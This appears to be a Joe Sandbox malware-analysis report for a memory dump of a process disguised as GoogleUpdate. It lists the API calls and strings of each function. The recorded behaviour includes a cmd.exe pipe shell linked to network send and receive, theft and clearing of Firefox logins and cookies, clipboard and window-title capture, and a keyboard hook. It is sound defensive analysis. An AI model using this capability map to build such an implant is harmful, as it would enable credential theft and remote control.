Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: P@
API String ID: 1279760036-676759640
Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

Function 00419797 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 004197AB

Strings

@, xrefs: 004197A1

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 257335e8d7f90f302e1c63bcee3e650057a1d083b4c07430f2bdd1a346c4e461
Instruction ID: 916baa9f79c233f702b1e805244b950efce88069b4bce771f790cc973d6f5f79
Opcode Fuzzy Hash: 257335e8d7f90f302e1c63bcee3e650057a1d083b4c07430f2bdd1a346c4e461
Instruction Fuzzy Hash: 6DD017B58023189FC720DFA8E904A8DBBFCFB08214F00026AEC49E3300E770A8008B84

Function 0041A86B Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00471E90,00471E90), ref: 0041A893
LocalFree.KERNEL32(?,?), ref: 0041A8B9

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID:
API String ID: 1427518018-0
Opcode ID: 7914be0bb51d727ecb147dfc24e1e6cc4771dcb9d7df002be239442017c2ad70
Instruction ID: 5f5c77436e78e5d49d2704262acff0899a585b39497b2c8097545773f5be8339
Opcode Fuzzy Hash: 7914be0bb51d727ecb147dfc24e1e6cc4771dcb9d7df002be239442017c2ad70
Instruction Fuzzy Hash: B6F0A430B002096ADB18A766DD4ADFFB72DDB94305B10013FB515B22D1EAB85E069A5A

Function 004195F8 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,00000037,00471FFC), ref: 00419615
GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: bc1d19bd62bd99057b7f44f52ab1f34f4f39e14c1e12de22008ea1118711f052
Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
Opcode Fuzzy Hash: bc1d19bd62bd99057b7f44f52ab1f34f4f39e14c1e12de22008ea1118711f052
Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98

Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238a90e17962ef4b1f002eb86d9ec1d4f78461c129c2d14368e201ad837faa61
Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
Opcode Fuzzy Hash: 238a90e17962ef4b1f002eb86d9ec1d4f78461c129c2d14368e201ad837faa61
Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

Function 00419A77 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00471E78), ref: 00419A9B
GetWindowTextW.USER32(00000000,?,00000200), ref: 00419AAA

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 15702703b5202debf026d83c8502143a7b58117ce6a26c879db5ece8c8543682
Instruction ID: cf2e52be04f8ec8d08d18c914cdb682983edf2912a2e664b649e3c091a1f3b93
Opcode Fuzzy Hash: 15702703b5202debf026d83c8502143a7b58117ce6a26c879db5ece8c8543682
Instruction Fuzzy Hash: 8FE09B76D0031867EB2067A5EC4DFEBB77CEB84711F0401AEF918D3142E974990486E4

Function 0041393F Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
WSASetLastError.WS2_32(00000000), ref: 00413966

Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 00413894
Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 004138CC
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
Part of subcall function 004137DC: FreeLibrary.KERNEL32(00000000), ref: 004138E5
Part of subcall function 004137DC: GetProcAddress.KERNEL32(00000000,?), ref: 004138F4

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID:
API String ID: 1170566393-0
Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD

Function 00404A81 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON

Download Yara Rule

APIs

send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 45ec037ff3f11c3377af06228b41f3649b2aef2a985cc8a2ae7fe0674100b2b5
Instruction ID: 386fdb2549058a8a428fc13e61fc6334607da2f15a29588e2e4b41d188acd0cd
Opcode Fuzzy Hash: 45ec037ff3f11c3377af06228b41f3649b2aef2a985cc8a2ae7fe0674100b2b5
Instruction Fuzzy Hash: D12175729001196BCF04BBA1EC96DEEBB3CFF14314B00413AF905B21E2EA78A905C6A4

Function 00404E06 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

Function 004093EF Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CallNextHookEx.USER32(00472008,?,?,?), ref: 0040945A

Part of subcall function 0040A592: GetKeyState.USER32(00000011), ref: 0040A597

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CallHookNextState
String ID:
API String ID: 3280314413-0
Opcode ID: b213533d89f34a8f60d49ea32f91a8c14c5b96264486c69f750ded0ae2646848
Instruction ID: ef3e78a0d56c017aaa0a0c11970866132e74996ba15d005dbfef21be4abb79d1
Opcode Fuzzy Hash: b213533d89f34a8f60d49ea32f91a8c14c5b96264486c69f750ded0ae2646848
Instruction Fuzzy Hash: 49F0F4322083015BCA08BF799C4446F775AEB95318F00447FFA426A2D3CA7ACC1A875B

Function 00404B76 Relevance: 1.5, APIs: 1, Instructions: 28networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(FFFFFFFF,00000000,00000000,00000000,?,00471E90,00404C29,00000000,00000000,00000000,?,00471E90,?), ref: 00404BBA

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: b89ce8ac9f40c7ccd51c1a2e24f7abd116ec708403ee352032a183d8b5ab9f41
Instruction ID: 05df22d7d1b84fe333aabf98f29930b086fa4c9395f38fd5094a2cbf6cf0f4d8
Opcode Fuzzy Hash: b89ce8ac9f40c7ccd51c1a2e24f7abd116ec708403ee352032a183d8b5ab9f41
Instruction Fuzzy Hash: 25F08236108212FFCB016F14EC08E4AFB66FF84721F10862AF510622A187B1FC21DB55

Non-executed Functions

Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056C6

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

__Init_thread_footer.LIBCMT ref: 00405703
CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
TerminateProcess.KERNEL32(00000000), ref: 004059F7
CloseHandle.KERNEL32 ref: 00405A03
CloseHandle.KERNEL32 ref: 00405A0B
CloseHandle.KERNEL32 ref: 00405A1D
CloseHandle.KERNEL32 ref: 00405A25

Strings

SystemDrive, xrefs: 00405741
cmd.exe, xrefs: 0040572D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: 7a52aa9ece44894e4bbd27c104709daa3ae844b0e5ba1a64520aa67f220059eb
Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
Opcode Fuzzy Hash: 7a52aa9ece44894e4bbd27c104709daa3ae844b0e5ba1a64520aa67f220059eb
Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E

Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
FindClose.KERNEL32(00000000), ref: 0040AB0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
FindClose.KERNEL32(00000000), ref: 0040AC53

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AA93
\logins.json, xrefs: 0040AB75
\key3.db, xrefs: 0040ABB7
[Firefox StoredLogins not found], xrefs: 0040AB15
UserProfile, xrefs: 0040AAA1
[Firefox StoredLogins Cleared!], xrefs: 0040AC40

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 073fac6c51c1e751163950d4b7c16a7b92d8ae4f100ca626a4fd65d43b926aa3
Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
Opcode Fuzzy Hash: 073fac6c51c1e751163950d4b7c16a7b92d8ae4f100ca626a4fd65d43b926aa3
Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A

Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
FindClose.KERNEL32(00000000), ref: 0040AD0A
FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
FindClose.KERNEL32(00000000), ref: 0040ADF0
FindClose.KERNEL32(00000000), ref: 0040AE11

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040AC93
[Firefox Cookies not found], xrefs: 0040AD15, 0040ADDD
[Firefox cookies found, cleared!], xrefs: 0040AE20
UserProfile, xrefs: 0040ACA1
\cookies.sqlite, xrefs: 0040AD6D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 0bc79713efeab2056573a716af7b519b91b9c0107f61c6b9dd4d47a89dc72595
Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
Opcode Fuzzy Hash: 0bc79713efeab2056573a716af7b519b91b9c0107f61c6b9dd4d47a89dc72595
Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E

Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414EC2
EmptyClipboard.USER32 ref: 00414ED0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
GlobalLock.KERNEL32(00000000), ref: 00414EF9
GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID:
API String ID: 3520204547-0
Opcode ID: 8ddb5d8ef78071ab70dae4603bd9b06982325a8b73943224197f534490ef07d5
Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
Opcode Fuzzy Hash: 8ddb5d8ef78071ab70dae4603bd9b06982325a8b73943224197f534490ef07d5
Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A

Function 0041A01B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125

Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB

GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C

Strings

pth_unenc, xrefs: 0041A01B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID: pth_unenc
API String ID: 2341273852-4028850238
Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19

Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
GetLastError.KERNEL32 ref: 00418771
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
